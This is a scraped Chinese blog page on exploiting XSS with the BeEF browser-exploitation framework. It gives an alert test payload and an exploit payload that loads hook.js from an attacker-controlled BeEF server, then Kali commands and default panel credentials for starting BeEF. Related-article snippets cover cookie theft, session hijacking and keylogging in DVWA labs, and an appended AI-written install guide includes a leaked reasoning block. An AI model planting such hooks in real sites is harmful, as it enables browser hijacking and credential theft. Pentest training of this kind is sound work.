BeEF利用XSS漏洞

最新推荐文章于 2024-08-20 18:00:00 发布
最新推荐文章于 2024-08-20 18:00:00 发布
阅读量2.5k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: Kali 漏洞利用 Linux 文章标签: 软件 B/S
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42196196/article/details/82954518

XSS跨站脚本攻击,检测与利用方法

poe:<script>alert('XSS')</script>


exp:<script src="http://<beef服务端ip>:3000/hook.js"></script>//攻击者ip

kali下:
find / -name beef-xss                   //查找beef-xss
cd /usr/share/beef-xss                 //进入beef-xss路径
./beef                                          //启动beef

浏览器url登陆:<beef服务端ip>:3000/ui/panel
默认用户名:beef  默认密码:beef

[渗透测试笔记] 08.xss原理分析、beef
H4ppyD0g的博客
02-02 617
xss攻击是篡改网页,插入恶意脚本,当用户在浏览网页时,实现控制用户浏览器行为的一种攻击方式。例如:document.write(‘hello’); 篡改网页内容 xss攻击形式有三种:存储型、反射型、DOM型 存储型xss: 又叫持久型xss,主要是将paload发送到服务器并存储到数据库中,这样在下次访问页面时,就会将之前存入的恶意代码进行解析,进而修改网页内容形成xss攻击。 访问携带xss...
利用BeEF执行XSS攻击
m0_70185580的博客
05-31 783
XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。BeEF是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。当攻击成功后,可以在BeEF的控制面板中查看受害者的浏览器信息,并控制其浏览器。这段代码会将BeEF的hook.js文件注入到目标网站中,并启动BeEF的hook服务。接下来,需要获取要攻击的网站的URL。当受害者在浏览器中打开包含恶意脚本的页面时,BeEF就会启动并开始执行攻击。
xss漏洞以及beef的使用
young‘s blog
07-20 3166
这次的xss漏洞就从dvwa开始吧。 反射型: 先是low级别的,输入1后页面变为 这次尝试一下burpsuite里自带的扫描器。 首先不得不说dvwa设计有一些缺陷,有时候等级改不过去,这就让人很蛋疼,所以还是要自己手动改一下。就因为这个,扫描器一直扫不出来。用了改过之后的包就可以扫描了。上图 可以看到箭头指向的就是payload 看一下返回页面,就是弹框1了。没啥别的。 抓一下返回包看一看 可...
BeEf利用跨站脚本漏洞进行钓鱼
qq_42773814的博客
01-19 2855
BeEf 简介 BeEf 是目前最为流行的 Web 框架攻击平台,专注于利用浏览器漏洞,它的全称是 The Browser Exploitation Framework 。 BeEf 提供一个 Web 界面来进行操作,只要访问了嵌入 hook.js 的页面,抑或执行了 hook.js 文件的浏览器,就会不断地以 GET 的方式将其自身的相关信息传到 BeEf 的服务端。 最新的kali系统已经不会默认安装 BeEf ,需要我们自行安装。 apt install beef-xss 安装完成后,直接
BeEF-XSS攻击
彭淦淦的博客
05-11 1105
6.1 问题 Kali虚拟机(192.168.111.132)搭建BeEF服务 宿主机(192.168.111.1)搭建正常网站 Win2008虚拟机(192.168.111.133)模拟用户被攻击 6.2 步骤 实现此案例需要按照如下步骤进行。 1)Kali虚拟机安装BeEF,依次运行命令apt-get update,apt-get install beef-xss,安装完成后启动beef-xss,用户名beef,自定义密码例如123456,如图-11和图-12所示 图-11 图-1
kali漏洞利用BeeF
The__Apollo的博客
04-22 5938
XSS漏洞往往需要一个强大的框架支持,如网络上的XSS平台,在KALI下,Beef是一款丝毫不逊于XSS平台的工具。Beef是浏览器攻击框架的简称,是一款专注于浏览器的渗透测试工具。打开beefbeef-xss 默认用户名和密码分别为beef/beef 假设被测试主机由于XSS漏洞请求到下面这个页面 这时候可以看到,online browsers就多了一项127.0.0.1
XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
m0_64378913的博客
06-02 4947
(1)了解beEF工具的使用; (2)加深理解XSS漏洞利用和危害; (3)掌握浏览器劫持的攻击方法; (4)掌握会话劫持的攻击方法; (5)掌握通过XSS漏洞GetShell的方法。
利用xss漏洞获取cookie并实现远程登录实验
2302_81105681的博客
04-19 515
beef截获到受害者的cookie替换登录数据包的cookie,使用受害者的身份完成登录。服务器:winserver 2022 (192.168.25.156)攻击机的beef页面中发现受害者上钩,获得受害者的cookie。注意:这个输入框需要按F12在前端代码中修改最长字符。访问到被注入恶意代码的页面,这时受害者还没有察觉到。攻击机登录dvwa,打开存在xss漏洞的页面。本实验用到的环境为:DVWA靶场。攻击机登录的账户为smithy。受害者登录的账户为admin。受害者:win 10。
XSS漏洞
2401_83181186的博客
04-25 1244
XSS漏洞介绍以及beef,waf简介
beef-xss安装与使用
Bu2n的博客
12-07 3759
文章目录kali安装与更新软件beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
XSS漏洞07】基于神器beEFXSS漏洞利用实验(浏览器劫持、会话劫持、GetShell)
Fighting_hawk的博客
02-26 5472
1. 加深理解XSS漏洞利用和危害; 2. 了解beEF工具的使用; 3. 掌握浏览器劫持的攻击方法; 4. 掌握会话劫持的攻击方法; 5. 掌握通过XSS漏洞GetShell的方法。
利用Beef进行XSS会话劫持
Deeeelete的博客
02-09 1663
1.登入靶机中的DVWA环境,安全等级调到最低,进入xss环境界面2.打开自带的beef软件第一次使用会提示你修改密码vim /etc/beef-xss/config.yaml打开修改,将密码修改成其他任意的内容就可以重新打开软件了。保存退出然后重新打开软件就可以正常进入了登录密码就是我们刚才修改的,输入然后登录3.回到终端,因为beef打开会默认开一个终端和一个浏览器界面,我们找到beff为我们...
BeEF-XSS实验手记
二歪的防痴呆笔记
04-02 2522
这里使用的是Kali里面预装的BeEF-XSS,在Kali里面打开 应用程序-08-漏洞利用工具集-beef XSS framework。 或者直接运行beef-xss命令运行: kali已经把beef-xss做成服务了,可以使用systemctl 命令来启动或关闭beef服务器 systemctl start beef-xss.service #开启beef systemctl sto...
xss-工具-Beef-Xss安装以及使用
weixin_44257023的博客
07-24 6530
xss-工具-Beef-Xss安装以及使用
beef-xss详细教程(一文带你学会beef) - Kali下安装beef - beef-xss反射型,储存型利用 - beef实现Cookie会话劫持 - 键盘监听 - 浏览器弹窗,重定向等
wangluoanquan111的博客
08-20 1632
✅作者简介:优快云内容合伙人、信息安全专业在校大学生🏆🔥系列专栏 :XSS漏洞应用-Beef💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。
浅谈一下xss工具----beef
划水的小白白
05-07 3817
今天主要聊一下,从认识xss的危害到beef-xss利用 beef是一个类似与sql注入的sqlmap一样,也是一种工具。 一、xss简介 定义: 跨站脚本攻击。xss是一种在web应用中的计算机安全漏洞, 它允许web用户将一些恶意代码植入到提供给其它用户使用的页面中 种类: 反射型xss: 提交得数据成功的实现了xss,但是仅仅是对你这次访问产生了影响,...
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
热门推荐
Martin-share的博客
02-12 2万+
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
BeEF-XSS详细使用教程
一个懒鬼的博客
05-10 6793
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS 关于kali没有安装beef可以参考下图: BeEF-XSS管理登录页面 用户名默认为beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览..
Kali安装beef-xssbeef-xss无法执行默认网络浏览器,beef-xss忘记/修改用户名密码
weixin_49112478的博客
07-12 2162
卡里安装beef-xss教程;解决beef-xss无法执行默认网络浏览器问题;beef-xss找回/修改用户名密码的方法介绍
beef-xss安装
最新发布
06-24
<think>首先,用户的问题是关于安装BeEF-XSS的指南或方法。BeEF-XSS是BrowserExploitationFramework,用于利用跨站脚本漏洞。回顾系统级指令:-所有行内数学表达式用$...$格式。-独立公式用$$...$$格式并单独成段。-LaTeX语法正确。-使用中文回答。-生成相关问题。-回答中引用的段落末尾自然地添加引用标识,例如[^1]。用户可见层指令:-回答结构清晰,帮助用户逐步解决问题,保证回答真实可靠。参考站内引用:-引用[1]:提到了使用aptremove和apt-getinstall来安装ruby和beef-xss。-引用[2]:描述了安装beef-xss时遇到的问题,并尝试手动安装ruby环境。-引用[3]:提供了使用Docker安装beef-xss的步骤。-引用[4]:讨论了新版Kali安装beef-xss失败的问题,并提供了Docker部署方案。用户上一次的问题是关于BeEF-XSS的安装指南。我的回答需要:1.结构清晰,逐步指导安装。2.基于引用内容,提供可靠的方法。3.使用中文。4.生成相关问题。5.在引用段落末尾添加引用标识。从引用中,我看到两种主要方法:-直接使用apt安装(但可能失败)。-使用Docker安装(更可靠)。引用[3]和[4]都推荐使用Docker,因为新版Kali可能有环境问题。所以,我应该优先推荐Docker方法,因为它更稳定。回答结构:1.**介绍**:简要说明BeEF-XSS和安装方法。2.**方法一:使用Docker安装(推荐)**:基于引用[3]和[4]提供步骤。3.**方法二:直接安装(可选,但可能有风险)**:基于引用[1]和[2],但警告可能的问题。4.**总结**:建议使用Docker。5.**生成相关问题**。确保在引用内容后添加引用标识。例如,当提到Docker安装步骤时,添加[^3]。由于用户是中文,整个回答用中文。生成相关问题:-例如:如何配置BeEF-XSS?如何解决安装中的常见问题?最终回答格式:-清晰分段。-代码块使用代码格式。-末尾添加相关问题。现在,制定步骤。**方法一:Docker安装(推荐)**-步骤1:下载Docker镜像或构建。-步骤2:运行容器。-步骤3:访问Web界面。基于引用[3]:-下载镜像:`wgethttps://...`-导入镜像:`dockerload<beef-docker.tar`-重命名:`dockertag...`-运行:`dockerrun-d--namebeef-p3000:3000beef`-访问:http://127.0.0.1:3000/ui/panel基于引用[4]:-克隆代码:`gitclonehttps://github.com/beefproject/beef.git`-修改配置文件:`vimconfig.yaml`-构建镜像:`dockerbuild-tbeef.`-运行:`dockerrun...`引用[4]更详细,包括修改凭证。我应该结合两者,优先引用[3]因为它更简单。**方法二:直接安装**-尝试:`sudoaptupdate&&sudoaptinstallbeef-xss`-但可能失败,需要安装ruby环境:`sudoaptinstallrubyruby-dev`最后,总结推荐Docker。生成相关问题:1.BeEF-XSS的基本配置是什么?2.如何解决BeEF-XSS安装中的常见错误?3.BeEF-XSS有哪些实际应用场景?</think>### BeEF-XSS 安装指南 BeEF-XSS(Browser Exploitation Framework)是一个用于检测和利用跨站脚本(XSS漏洞的工具。安装过程可能因系统环境(如Kali Linux版本)而复杂,尤其在较新的Kali系统中,直接安装常因Ruby/gems版本兼容性问题失败。以下提供两种可靠方法:**推荐优先使用Docker安装**(避免环境依赖问题),其次是直接APT安装(可能需手动解决依赖)。所有步骤均在终端以root权限执行。 --- ### 方法一:使用Docker安装(推荐,稳定性高) Docker容器化安装隔离环境依赖,适用于新版Kali(如2024版),成功率更高。参考官方及社区实践[^3][^4]。 1. **下载并导入Docker镜像** 从可靠源获取预构建镜像: ```bash wget https://oss-cdn.mashibing.com/teacher_attachment/149339/beef-docker.tar # 下载镜像文件 docker load < beef-docker.tar # 导入镜像到Docker docker tag 15c6a65cadb6 beef # 重命名镜像为beef(镜像ID可能需验证) ``` 2. **启动BeEF容器** 映射端口并运行容器: ```bash docker run -d --name beef -p 3000:3000 -p 6789:6789 -p 61985:61985 -p 61986:61986 --restart=always beef ``` - `-p`参数映射端口:3000(Web界面)、6789(Hook脚本端口)等。 - `--restart=always`确保容器自动重启。 3. **访问Web管理界面** 浏览器打开: ``` http://127.0.0.1:3000/ui/panel ``` - 默认用户名:`beef` - 默认密码:`beef` - 登录后可配置Hook脚本和漏洞利用模块[^3]。 **附加命令**: - 重启容器:`docker restart beef` - 停止并删除容器:`docker stop beef && docker rm beef` > **注意**:若预构建镜像不可用,可手动构建(耗时较长): > ```bash > git clone https://github.com/beefproject/beef.git # 克隆代码库 > cd beef > vim config.yaml # 修改凭证(默认凭据不安全),设置`passwd: "自定义密码"`[^4] > docker build -t beef . # 构建镜像 > docker run -d --name beef -p 3000:3000 beef # 运行容器 > ``` --- ### 方法二:直接APT安装(适用于旧版Kali,风险较高) 在早期Kali版本中,可直接通过包管理器安装,但新版(如Kali 2024)常因Ruby依赖失败。若尝试此方法,需先解决环境问题[^1][^2]。 1. **更新系统并安装依赖** 安装Ruby环境(关键依赖): ```bash sudo apt update && sudo apt upgrade # 更新系统 sudo apt install ruby ruby-dev libpcap-dev # 安装Ruby及开发库 gem install eventmachine # 安装Ruby gem ``` 2. **安装BeEF-XSS** 通过APT安装: ```bash sudo apt install beef-xss ``` 3. **启动服务及问题处理** 启动服务: ```bash systemctl start beef-xss # 或 service beef-xss start ``` - **常见失败处理**:若报错`beef-xss.service: Main process exited`,通常是Ruby版本冲突。需降级Ruby或改用Docker[^2][^4]。 - 访问界面:`http://localhost:3000/ui/panel`(凭证同上)。 > **警告**:此方法在Kali 2024失败率较高。若安装后服务无法启动,建议卸载并切换到Docker方案: > ```bash > sudo apt remove --purge beef-xss ruby # 彻底卸载 > sudo apt autoremove > ``` --- ### 总结建议 - **优先选择Docker安装**:避免环境依赖问题,兼容性强[^3][^4]。 - 直接APT安装仅适用于旧版系统,且需额外手动修复。 - 安装完成后,务必修改默认密码(如`config.yaml`中的`passwd`字段)以增强安全性[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值